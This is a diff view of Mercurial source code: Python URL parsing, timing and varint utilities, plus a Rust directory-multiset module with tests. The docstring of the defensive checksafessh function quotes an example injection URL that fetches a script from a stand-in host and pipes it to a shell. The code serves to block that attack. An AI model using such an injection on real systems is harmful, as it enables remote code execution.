2783 2785 if not path:
2784 2786 path = None
2785 2787 if self._localpath:
2786 2788 self.path = ''
2787 2789 return
2788 2790 else:
2789 2791 if self._localpath:
2790 2792 self.path = path
2791 2793 return
2792 2794
2793 2795 if parsequery and '?' in path:
2794 2796 path, self.query = path.split('?', 1)
2795 2797 if not path:
2796 2798 path = None
2797 2799 if not self.query:
2798 2800 self.query = None
2799 2801
2800 2802 # // is required to specify a host/authority
2801 2803 if path and path.startswith('//'):
2802 2804 parts = path[2:].split('/', 1)
2803 2805 if len(parts) > 1:
2804 2806 self.host, path = parts
2805 2807 else:
2806 2808 self.host = parts[0]
2807 2809 path = None
2808 2810 if not self.host:
2809 2811 self.host = None
2810 2812 # path of file:///d is /d
2811 2813 # path of file:///d:/ is d:/, not /d:/
2812 2814 if path and not hasdriveletter(path):
2813 2815 path = '/' + path
2814 2816
2815 2817 if self.host and '@' in self.host:
2816 2818 self.user, self.host = self.host.rsplit('@', 1)
2817 2819 if ':' in self.user:
2818 2820 self.user, self.passwd = self.user.split(':', 1)
2819 2821 if not self.host:
2820 2822 self.host = None
2821 2823
2822 2824 # Don't split on colons in IPv6 addresses without ports
2823 2825 if (self.host and ':' in self.host and
2824 2826 not (self.host.startswith('[') and self.host.endswith(']'))):
2825 2827 self._hostport = self.host
2826 2828 self.host, self.port = self.host.rsplit(':', 1)
2827 2829 if not self.host:
2828 2830 self.host = None
2829 2831
2830 2832 if (self.host and self.scheme == 'file' and
2831 2833 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2832 2834 raise error.Abort(_('file:// URLs can only refer to localhost'))
2833 2835
2834 2836 self.path = path
2835 2837
2836 2838 # leave the query string escaped
2837 2839 for a in ('user', 'passwd', 'host', 'port',
2838 2840 'path', 'fragment'):
2839 2841 v = getattr(self, a)
2840 2842 if v is not None:
2841 2843 setattr(self, a, urlreq.unquote(v))
2842 2844
2843 2845 @encoding.strmethod
2844 2846 def __repr__(self):
2845 2847 attrs = []
2846 2848 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2847 2849 'query', 'fragment'):
2848 2850 v = getattr(self, a)
2849 2851 if v is not None:
2850 2852 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2851 2853 return '<url %s>' % ', '.join(attrs)
2852 2854
2853 2855 def __bytes__(self):
2854 2856 r"""Join the URL's components back into a URL string.
2855 2857
2856 2858 Examples:
2857 2859
2858 2860 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2859 2861 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2860 2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2861 2863 'http://user:pw@host:80/?foo=bar&baz=42'
2862 2864 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2863 2865 'http://user:pw@host:80/?foo=bar%3dbaz'
2864 2866 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2865 2867 'ssh://user:pw@[::1]:2200//home/joe#'
2866 2868 >>> bytes(url(b'http://localhost:80//'))
2867 2869 'http://localhost:80//'
2868 2870 >>> bytes(url(b'http://localhost:80/'))
2869 2871 'http://localhost:80/'
2870 2872 >>> bytes(url(b'http://localhost:80'))
2871 2873 'http://localhost:80/'
2872 2874 >>> bytes(url(b'bundle:foo'))
2873 2875 'bundle:foo'
2874 2876 >>> bytes(url(b'bundle://../foo'))
2875 2877 'bundle:../foo'
2876 2878 >>> bytes(url(b'path'))
2877 2879 'path'
2878 2880 >>> bytes(url(b'file:///tmp/foo/bar'))
2879 2881 'file:///tmp/foo/bar'
2880 2882 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2881 2883 'file:///c:/tmp/foo/bar'
2882 2884 >>> print(url(br'bundle:foo\bar'))
2883 2885 bundle:foo\bar
2884 2886 >>> print(url(br'file:///D:\data\hg'))
2885 2887 file:///D:\data\hg
2886 2888 """
2887 2889 if self._localpath:
2888 2890 s = self.path
2889 2891 if self.scheme == 'bundle':
2890 2892 s = 'bundle:' + s
2891 2893 if self.fragment:
2892 2894 s += '#' + self.fragment
2893 2895 return s
2894 2896
2895 2897 s = self.scheme + ':'
2896 2898 if self.user or self.passwd or self.host:
2897 2899 s += '//'
2898 2900 elif self.scheme and (not self.path or self.path.startswith('/')
2899 2901 or hasdriveletter(self.path)):
2900 2902 s += '//'
2901 2903 if hasdriveletter(self.path):
2902 2904 s += '/'
2903 2905 if self.user:
2904 2906 s += urlreq.quote(self.user, safe=self._safechars)
2905 2907 if self.passwd:
2906 2908 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2907 2909 if self.user or self.passwd:
2908 2910 s += '@'
2909 2911 if self.host:
2910 2912 if not (self.host.startswith('[') and self.host.endswith(']')):
2911 2913 s += urlreq.quote(self.host)
2912 2914 else:
2913 2915 s += self.host
2914 2916 if self.port:
2915 2917 s += ':' + urlreq.quote(self.port)
2916 2918 if self.host:
2917 2919 s += '/'
2918 2920 if self.path:
2919 2921 # TODO: similar to the query string, we should not unescape the
2920 2922 # path when we store it, the path might contain '%2f' = '/',
2921 2923 # which we should *not* escape.
2922 2924 s += urlreq.quote(self.path, safe=self._safepchars)
2923 2925 if self.query:
2924 2926 # we store the query in escaped form.
2925 2927 s += '?' + self.query
2926 2928 if self.fragment is not None:
2927 2929 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2928 2930 return s
2929 2931
2930 2932 __str__ = encoding.strmethod(__bytes__)
2931 2933
2932 2934 def authinfo(self):
2933 2935 user, passwd = self.user, self.passwd
2934 2936 try:
2935 2937 self.user, self.passwd = None, None
2936 2938 s = bytes(self)
2937 2939 finally:
2938 2940 self.user, self.passwd = user, passwd
2939 2941 if not self.user:
2940 2942 return (s, None)
2941 2943 # authinfo[1] is passed to urllib2 password manager, and its
2942 2944 # URIs must not contain credentials. The host is passed in the
2943 2945 # URIs list because Python < 2.4.3 uses only that to search for
2944 2946 # a password.
2945 2947 return (s, (None, (s, self.host),
2946 2948 self.user, self.passwd or ''))
2947 2949
2948 2950 def isabs(self):
2949 2951 if self.scheme and self.scheme != 'file':
2950 2952 return True # remote URL
2951 2953 if hasdriveletter(self.path):
2952 2954 return True # absolute for our purposes - can't be joined()
2953 2955 if self.path.startswith(br'\\'):
2954 2956 return True # Windows UNC path
2955 2957 if self.path.startswith('/'):
2956 2958 return True # POSIX-style
2957 2959 return False
2958 2960
2959 2961 def localpath(self):
2960 2962 if self.scheme == 'file' or self.scheme == 'bundle':
2961 2963 path = self.path or '/'
2962 2964 # For Windows, we need to promote hosts containing drive
2963 2965 # letters to paths with drive letters.
2964 2966 if hasdriveletter(self._hostport):
2965 2967 path = self._hostport + '/' + self.path
2966 2968 elif (self.host is not None and self.path
2967 2969 and not hasdriveletter(path)):
2968 2970 path = '/' + path
2969 2971 return path
2970 2972 return self._origpath
2971 2973
2972 2974 def islocal(self):
2973 2975 '''whether localpath will return something that posixfile can open'''
2974 2976 return (not self.scheme or self.scheme == 'file'
2975 2977 or self.scheme == 'bundle')
2976 2978
2977 2979 def hasscheme(path):
2978 2980 return bool(url(path).scheme)
2979 2981
2980 2982 def hasdriveletter(path):
2981 2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2982 2984
2983 2985 def urllocalpath(path):
2984 2986 return url(path, parsequery=False, parsefragment=False).localpath()
2985 2987
2986 2988 def checksafessh(path):
2987 2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2988 2990
2989 2991 This is a sanity check for ssh urls. ssh will parse the first item as
2990 2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2991 2993 Let's prevent these potentially exploited urls entirely and warn the
2992 2994 user.
2993 2995
2994 2996 Raises an error.Abort when the url is unsafe.
2995 2997 """
2996 2998 path = urlreq.unquote(path)
2997 2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2998 3000 raise error.Abort(_('potentially unsafe url: %r') %
2999 3001 (pycompat.bytestr(path),))
3000 3002
3001 3003 def hidepassword(u):
3002 3004 '''hide user credential in a url string'''
3003 3005 u = url(u)
3004 3006 if u.passwd:
3005 3007 u.passwd = '***'
3006 3008 return bytes(u)
3007 3009
3008 3010 def removeauth(u):
3009 3011 '''remove all authentication information from a url string'''
3010 3012 u = url(u)
3011 3013 u.user = u.passwd = None
3012 3014 return bytes(u)
3013 3015
3014 3016 timecount = unitcountfn(
3015 3017 (1, 1e3, _('%.0f s')),
3016 3018 (100, 1, _('%.1f s')),
3017 3019 (10, 1, _('%.2f s')),
3018 3020 (1, 1, _('%.3f s')),
3019 3021 (100, 0.001, _('%.1f ms')),
3020 3022 (10, 0.001, _('%.2f ms')),
3021 3023 (1, 0.001, _('%.3f ms')),
3022 3024 (100, 0.000001, _('%.1f us')),
3023 3025 (10, 0.000001, _('%.2f us')),
3024 3026 (1, 0.000001, _('%.3f us')),
3025 3027 (100, 0.000000001, _('%.1f ns')),
3026 3028 (10, 0.000000001, _('%.2f ns')),
3027 3029 (1, 0.000000001, _('%.3f ns')),
3028 3030 )
3029 3031
3030 3032 @attr.s
3031 3033 class timedcmstats(object):
3032 3034 """Stats information produced by the timedcm context manager on entering."""
3033 3035
3034 3036 # the starting value of the timer as a float (meaning and resulution is
3035 3037 # platform dependent, see util.timer)
3036 3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3037 3039 # the number of seconds as a floating point value; starts at 0, updated when
3038 3040 # the context is exited.
3039 3041 elapsed = attr.ib(default=0)
3040 3042 # the number of nested timedcm context managers.
3041 3043 level = attr.ib(default=1)
3042 3044
3043 3045 def __bytes__(self):
3044 3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3045 3047
3046 3048 __str__ = encoding.strmethod(__bytes__)
3047 3049
3048 3050 @contextlib.contextmanager
3049 3051 def timedcm(whencefmt, *whenceargs):
3050 3052 """A context manager that produces timing information for a given context.
3051 3053
3052 3054 On entering a timedcmstats instance is produced.
3053 3055
3054 3056 This context manager is reentrant.
3055 3057
3056 3058 """
3057 3059 # track nested context managers
3058 3060 timedcm._nested += 1
3059 3061 timing_stats = timedcmstats(level=timedcm._nested)
3060 3062 try:
3061 3063 with tracing.log(whencefmt, *whenceargs):
3062 3064 yield timing_stats
3063 3065 finally:
3064 3066 timing_stats.elapsed = timer() - timing_stats.start
3065 3067 timedcm._nested -= 1
3066 3068
3067 3069 timedcm._nested = 0
3068 3070
3069 3071 def timed(func):
3070 3072 '''Report the execution time of a function call to stderr.
3071 3073
3072 3074 During development, use as a decorator when you need to measure
3073 3075 the cost of a function, e.g. as follows:
3074 3076
3075 3077 @util.timed
3076 3078 def foo(a, b, c):
3077 3079 pass
3078 3080 '''
3079 3081
3080 3082 def wrapper(*args, **kwargs):
3081 3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3082 3084 result = func(*args, **kwargs)
3083 3085 stderr = procutil.stderr
3084 3086 stderr.write('%s%s: %s\n' % (
3085 3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3086 3088 time_stats))
3087 3089 return result
3088 3090 return wrapper
3089 3091
3090 3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3091 3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3092 3094
3093 3095 def sizetoint(s):
3094 3096 '''Convert a space specifier to a byte count.
3095 3097
3096 3098 >>> sizetoint(b'30')
3097 3099 30
3098 3100 >>> sizetoint(b'2.2kb')
3099 3101 2252
3100 3102 >>> sizetoint(b'6M')
3101 3103 6291456
3102 3104 '''
3103 3105 t = s.strip().lower()
3104 3106 try:
3105 3107 for k, u in _sizeunits:
3106 3108 if t.endswith(k):
3107 3109 return int(float(t[:-len(k)]) * u)
3108 3110 return int(t)
3109 3111 except ValueError:
3110 3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3111 3113
3112 3114 class hooks(object):
3113 3115 '''A collection of hook functions that can be used to extend a
3114 3116 function's behavior. Hooks are called in lexicographic order,
3115 3117 based on the names of their sources.'''
3116 3118
3117 3119 def __init__(self):
3118 3120 self._hooks = []
3119 3121
3120 3122 def add(self, source, hook):
3121 3123 self._hooks.append((source, hook))
3122 3124
3123 3125 def __call__(self, *args):
3124 3126 self._hooks.sort(key=lambda x: x[0])
3125 3127 results = []
3126 3128 for source, hook in self._hooks:
3127 3129 results.append(hook(*args))
3128 3130 return results
3129 3131
3130 3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3131 3133 '''Yields lines for a nicely formatted stacktrace.
3132 3134 Skips the 'skip' last entries, then return the last 'depth' entries.
3133 3135 Each file+linenumber is formatted according to fileline.
3134 3136 Each line is formatted according to line.
3135 3137 If line is None, it yields:
3136 3138 length of longest filepath+line number,
3137 3139 filepath+linenumber,
3138 3140 function
3139 3141
3140 3142 Not be used in production code but very convenient while developing.
3141 3143 '''
3142 3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3143 3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3144 3146 ][-depth:]
3145 3147 if entries:
3146 3148 fnmax = max(len(entry[0]) for entry in entries)
3147 3149 for fnln, func in entries:
3148 3150 if line is None:
3149 3151 yield (fnmax, fnln, func)
3150 3152 else:
3151 3153 yield line % (fnmax, fnln, func)
3152 3154
3153 3155 def debugstacktrace(msg='stacktrace', skip=0,
3154 3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3155 3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3156 3158 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3157 3159 By default it will flush stdout first.
3158 3160 It can be used everywhere and intentionally does not require an ui object.
3159 3161 Not be used in production code but very convenient while developing.
3160 3162 '''
3161 3163 if otherf:
3162 3164 otherf.flush()
3163 3165 f.write('%s at:\n' % msg.rstrip())
3164 3166 for line in getstackframes(skip + 1, depth=depth):
3165 3167 f.write(line)
3166 3168 f.flush()
3167 3169
3168 3170 class dirs(object):
3169 3171 '''a multiset of directory names from a dirstate or manifest'''
3170 3172
3171 3173 def __init__(self, map, skip=None):
3172 3174 self._dirs = {}
3173 3175 addpath = self.addpath
3174 3176 if safehasattr(map, 'iteritems') and skip is not None:
3175 3177 for f, s in map.iteritems():
3176 3178 if s[0] != skip:
3177 3179 addpath(f)
3178 3180 else:
3179 3181 for f in map:
3180 3182 addpath(f)
3181 3183
3182 3184 def addpath(self, path):
3183 3185 dirs = self._dirs
3184 3186 for base in finddirs(path):
3185 3187 if base in dirs:
3186 3188 dirs[base] += 1
3187 3189 return
3188 3190 dirs[base] = 1
3189 3191
3190 3192 def delpath(self, path):
3191 3193 dirs = self._dirs
3192 3194 for base in finddirs(path):
3193 3195 if dirs[base] > 1:
3194 3196 dirs[base] -= 1
3195 3197 return
3196 3198 del dirs[base]
3197 3199
3198 3200 def __iter__(self):
3199 3201 return iter(self._dirs)
3200 3202
3201 3203 def __contains__(self, d):
3202 3204 return d in self._dirs
3203 3205
3204 3206 if safehasattr(parsers, 'dirs'):
3205 3207 dirs = parsers.dirs
3206 3208
3209 if rustdirs is not None:
3210 dirs = rustdirs
3211
3207 3212 def finddirs(path):
3208 3213 pos = path.rfind('/')
3209 3214 while pos != -1:
3210 3215 yield path[:pos]
3211 3216 pos = path.rfind('/', 0, pos)
3212 3217 yield ''
3213 3218
3214 3219
3215 3220 # convenient shortcut
3216 3221 dst = debugstacktrace
3217 3222
3218 3223 def safename(f, tag, ctx, others=None):
3219 3224 """
3220 3225 Generate a name that it is safe to rename f to in the given context.
3221 3226
3222 3227 f: filename to rename
3223 3228 tag: a string tag that will be included in the new name
3224 3229 ctx: a context, in which the new name must not exist
3225 3230 others: a set of other filenames that the new name must not be in
3226 3231
3227 3232 Returns a file name of the form oldname~tag[~number] which does not exist
3228 3233 in the provided context and is not in the set of other names.
3229 3234 """
3230 3235 if others is None:
3231 3236 others = set()
3232 3237
3233 3238 fn = '%s~%s' % (f, tag)
3234 3239 if fn not in ctx and fn not in others:
3235 3240 return fn
3236 3241 for n in itertools.count(1):
3237 3242 fn = '%s~%s~%s' % (f, tag, n)
3238 3243 if fn not in ctx and fn not in others:
3239 3244 return fn
3240 3245
3241 3246 def readexactly(stream, n):
3242 3247 '''read n bytes from stream.read and abort if less was available'''
3243 3248 s = stream.read(n)
3244 3249 if len(s) < n:
3245 3250 raise error.Abort(_("stream ended unexpectedly"
3246 3251 " (got %d bytes, expected %d)")
3247 3252 % (len(s), n))
3248 3253 return s
3249 3254
3250 3255 def uvarintencode(value):
3251 3256 """Encode an unsigned integer value to a varint.
3252 3257
3253 3258 A varint is a variable length integer of 1 or more bytes. Each byte
3254 3259 except the last has the most significant bit set. The lower 7 bits of
3255 3260 each byte store the 2's complement representation, least significant group
3256 3261 first.
3257 3262
3258 3263 >>> uvarintencode(0)
3259 3264 '\\x00'
3260 3265 >>> uvarintencode(1)
3261 3266 '\\x01'
3262 3267 >>> uvarintencode(127)
3263 3268 '\\x7f'
3264 3269 >>> uvarintencode(1337)
3265 3270 '\\xb9\\n'
3266 3271 >>> uvarintencode(65536)
3267 3272 '\\x80\\x80\\x04'
3268 3273 >>> uvarintencode(-1)
3269 3274 Traceback (most recent call last):
3270 3275 ...
3271 3276 ProgrammingError: negative value for uvarint: -1
3272 3277 """
3273 3278 if value < 0:
3274 3279 raise error.ProgrammingError('negative value for uvarint: %d'
3275 3280 % value)
3276 3281 bits = value & 0x7f
3277 3282 value >>= 7
3278 3283 bytes = []
3279 3284 while value:
3280 3285 bytes.append(pycompat.bytechr(0x80 | bits))
3281 3286 bits = value & 0x7f
3282 3287 value >>= 7
3283 3288 bytes.append(pycompat.bytechr(bits))
3284 3289
3285 3290 return ''.join(bytes)
3286 3291
3287 3292 def uvarintdecodestream(fh):
3288 3293 """Decode an unsigned variable length integer from a stream.
3289 3294
3290 3295 The passed argument is anything that has a ``.read(N)`` method.
3291 3296
3292 3297 >>> try:
3293 3298 ... from StringIO import StringIO as BytesIO
3294 3299 ... except ImportError:
3295 3300 ... from io import BytesIO
3296 3301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3297 3302 0
3298 3303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3299 3304 1
3300 3305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3301 3306 127
3302 3307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3303 3308 1337
3304 3309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3305 3310 65536
3306 3311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3307 3312 Traceback (most recent call last):
3308 3313 ...
3309 3314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3310 3315 """
3311 3316 result = 0
3312 3317 shift = 0
3313 3318 while True:
3314 3319 byte = ord(readexactly(fh, 1))
3315 3320 result |= ((byte & 0x7f) << shift)
3316 3321 if not (byte & 0x80):
3317 3322 return result
3318 3323 shift += 7
@@ -1,355 +1,357 b''
1 1 // dirs_multiset.rs
2 2 //
3 3 // Copyright 2019 Raphaël Gomès <rgomes@octobus.net>
4 4 //
5 5 // This software may be used and distributed according to the terms of the
6 6 // GNU General Public License version 2 or any later version.
7 7
8 8 //! A multiset of directory names.
9 9 //!
10 10 //! Used to counts the references to directories in a manifest or dirstate.
11 11 use std::collections::hash_map::Entry;
12 12 use std::collections::HashMap;
13 13 use std::ops::Deref;
14 14 use {DirsIterable, DirstateEntry, DirstateMapError};
15 15
16 16 #[derive(PartialEq, Debug)]
17 17 pub struct DirsMultiset {
18 18 inner: HashMap<Vec<u8>, u32>,
19 19 }
20 20
21 21 impl Deref for DirsMultiset {
22 22 type Target = HashMap<Vec<u8>, u32>;
23 23
24 24 fn deref(&self) -> &Self::Target {
25 25 &self.inner
26 26 }
27 27 }
28 28
29 29 impl DirsMultiset {
30 30 /// Initializes the multiset from a dirstate or a manifest.
31 31 ///
32 32 /// If `skip_state` is provided, skips dirstate entries with equal state.
33 33 pub fn new(iterable: DirsIterable, skip_state: Option<i8>) -> Self {
34 34 let mut multiset = DirsMultiset {
35 35 inner: HashMap::new(),
36 36 };
37 37
38 38 match iterable {
39 39 DirsIterable::Dirstate(vec) => {
40 40 for (ref filename, DirstateEntry { state, .. }) in vec {
41 41 // This `if` is optimized out of the loop
42 42 if let Some(skip) = skip_state {
43 43 if skip != state {
44 44 multiset.add_path(filename);
45 45 }
46 46 } else {
47 47 multiset.add_path(filename);
48 48 }
49 49 }
50 50 }
51 51 DirsIterable::Manifest(vec) => {
52 52 for ref filename in vec {
53 53 multiset.add_path(filename);
54 54 }
55 55 }
56 56 }
57 57
58 58 multiset
59 59 }
60 60
61 61 /// Returns the slice up to the next directory name from right to left,
62 62 /// without trailing slash
63 63 fn find_dir(path: &[u8]) -> &[u8] {
64 64 let mut path = path;
65 65 loop {
66 66 if let Some(new_pos) = path.len().checked_sub(1) {
67 67 if path[new_pos] == b'/' {
68 68 break &path[..new_pos];
69 69 }
70 70 path = &path[..new_pos];
71 71 } else {
72 72 break &[];
73 73 }
74 74 }
75 75 }
76 76
77 77 /// Increases the count of deepest directory contained in the path.
78 78 ///
79 79 /// If the directory is not yet in the map, adds its parents.
80 80 pub fn add_path(&mut self, path: &[u8]) {
81 81 let mut pos = path.len();
82 82
83 83 loop {
84 84 let subpath = Self::find_dir(&path[..pos]);
85 85 if let Some(val) = self.inner.get_mut(subpath) {
86 86 *val += 1;
87 87 break;
88 88 }
89 89 self.inner.insert(subpath.to_owned(), 1);
90 90
91 91 pos = subpath.len();
92 92 if pos == 0 {
93 93 break;
94 94 }
95 95 }
96 96 }
97 97
98 98 /// Decreases the count of deepest directory contained in the path.
99 99 ///
100 100 /// If it is the only reference, decreases all parents until one is
101 101 /// removed.
102 102 /// If the directory is not in the map, something horrible has happened.
103 103 pub fn delete_path(
104 104 &mut self,
105 105 path: &[u8],
106 106 ) -> Result<(), DirstateMapError> {
107 107 let mut pos = path.len();
108 108
109 109 loop {
110 110 let subpath = Self::find_dir(&path[..pos]);
111 111 match self.inner.entry(subpath.to_owned()) {
112 112 Entry::Occupied(mut entry) => {
113 113 let val = entry.get().clone();
114 114 if val > 1 {
115 115 entry.insert(val - 1);
116 116 break;
117 117 }
118 118 entry.remove();
119 119 }
120 120 Entry::Vacant(_) => {
121 return Err(DirstateMapError::PathNotFound(path.to_owned()))
121 return Err(DirstateMapError::PathNotFound(
122 path.to_owned(),
123 ))
122 124 }
123 125 };
124 126
125 127 pos = subpath.len();
126 128 if pos == 0 {
127 129 break;
128 130 }
129 131 }
130 132
131 133 Ok(())
132 134 }
133 135 }
134 136
135 137 #[cfg(test)]
136 138 mod tests {
137 139 use super::*;
138 140
139 141 #[test]
140 142 fn test_delete_path_path_not_found() {
141 143 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
142 144 let path = b"doesnotexist/";
143 145 assert_eq!(
144 146 Err(DirstateMapError::PathNotFound(path.to_vec())),
145 147 map.delete_path(path)
146 148 );
147 149 }
148 150
149 151 #[test]
150 152 fn test_delete_path_empty_path() {
151 153 let mut map =
152 154 DirsMultiset::new(DirsIterable::Manifest(vec![vec![]]), None);
153 155 let path = b"";
154 156 assert_eq!(Ok(()), map.delete_path(path));
155 157 assert_eq!(
156 158 Err(DirstateMapError::PathNotFound(path.to_vec())),
157 159 map.delete_path(path)
158 160 );
159 161 }
160 162
161 163 #[test]
162 164 fn test_delete_path_successful() {
163 165 let mut map = DirsMultiset {
164 166 inner: [("", 5), ("a", 3), ("a/b", 2), ("a/c", 1)]
165 167 .iter()
166 168 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
167 169 .collect(),
168 170 };
169 171
170 172 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
171 173 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
172 174 assert_eq!(
173 175 Err(DirstateMapError::PathNotFound(b"a/b/".to_vec())),
174 176 map.delete_path(b"a/b/")
175 177 );
176 178
177 179 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
178 180 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
179 181 eprintln!("{:?}", map);
180 182 assert_eq!(Ok(()), map.delete_path(b"a/"));
181 183 eprintln!("{:?}", map);
182 184
183 185 assert_eq!(Ok(()), map.delete_path(b"a/c/"));
184 186 assert_eq!(
185 187 Err(DirstateMapError::PathNotFound(b"a/c/".to_vec())),
186 188 map.delete_path(b"a/c/")
187 189 );
188 190 }
189 191
190 192 #[test]
191 193 fn test_add_path_empty_path() {
192 194 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
193 195 let path = b"";
194 196 map.add_path(path);
195 197
196 198 assert_eq!(1, map.len());
197 199 }
198 200
199 201 #[test]
200 202 fn test_add_path_successful() {
201 203 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
202 204
203 205 map.add_path(b"a/");
204 206 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
205 207 assert_eq!(1, *map.get(&Vec::new()).unwrap());
206 208 assert_eq!(2, map.len());
207 209
208 210 // Non directory should be ignored
209 211 map.add_path(b"a");
210 212 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
211 213 assert_eq!(2, map.len());
212 214
213 215 // Non directory will still add its base
214 216 map.add_path(b"a/b");
215 217 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
216 218 assert_eq!(2, map.len());
217 219
218 220 // Duplicate path works
219 221 map.add_path(b"a/");
220 222 assert_eq!(3, *map.get(&b"a".to_vec()).unwrap());
221 223
222 224 // Nested dir adds to its base
223 225 map.add_path(b"a/b/");
224 226 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
225 227 assert_eq!(1, *map.get(&b"a/b".to_vec()).unwrap());
226 228
227 229 // but not its base's base, because it already existed
228 230 map.add_path(b"a/b/c/");
229 231 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
230 232 assert_eq!(2, *map.get(&b"a/b".to_vec()).unwrap());
231 233
232 234 map.add_path(b"a/c/");
233 235 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
234 236
235 237 let expected = DirsMultiset {
236 238 inner: [("", 2), ("a", 5), ("a/b", 2), ("a/b/c", 1), ("a/c", 1)]
237 239 .iter()
238 240 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
239 241 .collect(),
240 242 };
241 243 assert_eq!(map, expected);
242 244 }
243 245
244 246 #[test]
245 247 fn test_dirsmultiset_new_empty() {
246 248 use DirsIterable::{Dirstate, Manifest};
247 249
248 250 let new = DirsMultiset::new(Manifest(vec![]), None);
249 251 let expected = DirsMultiset {
250 252 inner: HashMap::new(),
251 253 };
252 254 assert_eq!(expected, new);
253 255
254 256 let new = DirsMultiset::new(Dirstate(vec![]), None);
255 257 let expected = DirsMultiset {
256 258 inner: HashMap::new(),
257 259 };
258 260 assert_eq!(expected, new);
259 261 }
260 262
261 263 #[test]
262 264 fn test_dirsmultiset_new_no_skip() {
263 265 use DirsIterable::{Dirstate, Manifest};
264 266
265 267 let input_vec = ["a/", "b/", "a/c", "a/d/"]
266 268 .iter()
267 269 .map(|e| e.as_bytes().to_vec())
268 270 .collect();
269 271 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
270 272 .iter()
271 273 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
272 274 .collect();
273 275
274 276 let new = DirsMultiset::new(Manifest(input_vec), None);
275 277 let expected = DirsMultiset {
276 278 inner: expected_inner,
277 279 };
278 280 assert_eq!(expected, new);
279 281
280 282 let input_map = ["a/", "b/", "a/c", "a/d/"]
281 283 .iter()
282 284 .map(|f| {
283 285 (
284 286 f.as_bytes().to_vec(),
285 287 DirstateEntry {
286 288 state: 0,
287 289 mode: 0,
288 290 mtime: 0,
289 291 size: 0,
290 292 },
291 293 )
292 294 })
293 295 .collect();
294 296 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
295 297 .iter()
296 298 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
297 299 .collect();
298 300
299 301 let new = DirsMultiset::new(Dirstate(input_map), None);
300 302 let expected = DirsMultiset {
301 303 inner: expected_inner,
302 304 };
303 305 assert_eq!(expected, new);
304 306 }
305 307
306 308 #[test]
307 309 fn test_dirsmultiset_new_skip() {
308 310 use DirsIterable::{Dirstate, Manifest};
309 311
310 312 let input_vec = ["a/", "b/", "a/c", "a/d/"]
311 313 .iter()
312 314 .map(|e| e.as_bytes().to_vec())
313 315 .collect();
314 316 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
315 317 .iter()
316 318 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
317 319 .collect();
318 320
319 321 let new = DirsMultiset::new(Manifest(input_vec), Some('n' as i8));
320 322 let expected = DirsMultiset {
321 323 inner: expected_inner,
322 324 };
323 325 // Skip does not affect a manifest
324 326 assert_eq!(expected, new);
325 327
326 328 let input_map =
327 329 [("a/", 'n'), ("a/b/", 'n'), ("a/c", 'r'), ("a/d/", 'm')]
328 330 .iter()
329 331 .map(|(f, state)| {
330 332 (
331 333 f.as_bytes().to_vec(),
332 334 DirstateEntry {
333 335 state: *state as i8,
334 336 mode: 0,
335 337 mtime: 0,
336 338 size: 0,
337 339 },
338 340 )
339 341 })
340 342 .collect();
341 343
342 344 // "a" incremented with "a/c" and "a/d/"
343 345 let expected_inner = [("", 1), ("a", 2), ("a/d", 1)]
344 346 .iter()
345 347 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
346 348 .collect();
347 349
348 350 let new = DirsMultiset::new(Dirstate(input_map), Some('n' as i8));
349 351 let expected = DirsMultiset {
350 352 inner: expected_inner,
351 353 };
352 354 assert_eq!(expected, new);
353 355 }
354 356
